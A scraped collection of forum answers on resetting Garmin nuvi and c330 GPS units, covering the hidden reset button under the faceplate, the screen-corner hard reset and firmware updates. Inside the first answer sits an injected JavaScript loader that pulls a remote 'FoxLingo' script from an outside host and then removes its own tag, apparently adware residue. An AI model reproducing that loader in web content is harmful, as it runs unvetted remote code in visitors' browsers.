Press the small reset button for 5 seconds then power the unit off and then back on again. This should clear the problem.!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState '' this.readyState=="loaded" '' this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
I am having a little trouble understanding your question. If you sent your recalled nuvi in for service and got a defective replacement you will have to contact garmin and inform the of the situation. If you are at the most current firmware and are still having issues it is a hardware problem.
Hmmm. tricky. It'll eventually run flat but connect it to the computer and use Garmin WebUpdater (free download from Garmin) to check the software version - it may reinstall the software.
I read the manual. There is a reset button underneath the plastic cover surrounding the screen (pry off w/ your thumb) -- push the reset if the power can't be turned off otherwise.
with the garmin off, hold down the right bottom of the screen and turn the garmin on, it will then ask you if you want to perform a hard reset. Choose yes and that should fix your problem.
This solution is for c330 but it should work the same...
It took a nap...
Waking up your c330...
If you left your Garmin c330 on running the battery will have 1% life left. If you turn c330 back on again, it will flash screen for 3 seconds then die, even charging it at this point will not wake it back up. TO BRING IT BACK TO LIFE... plug in the power home or car into Garmin c330. There is a tab in the front Garmin gray frame of your screen. You must take like your fingernails and under the logo "GARMIN" pull the whole gray plastic frame off. Underneath the plastic frame to the right hand side. There is a "RESET" button. Make sure power is plugged in while hitting reset. Your battery should come back to life. Cheers

put your thumbnail under the silver faceplate above where it says garmin and on the right you will see a reset button. It will reset your garmin and you will not lose your information. Hope this helps.
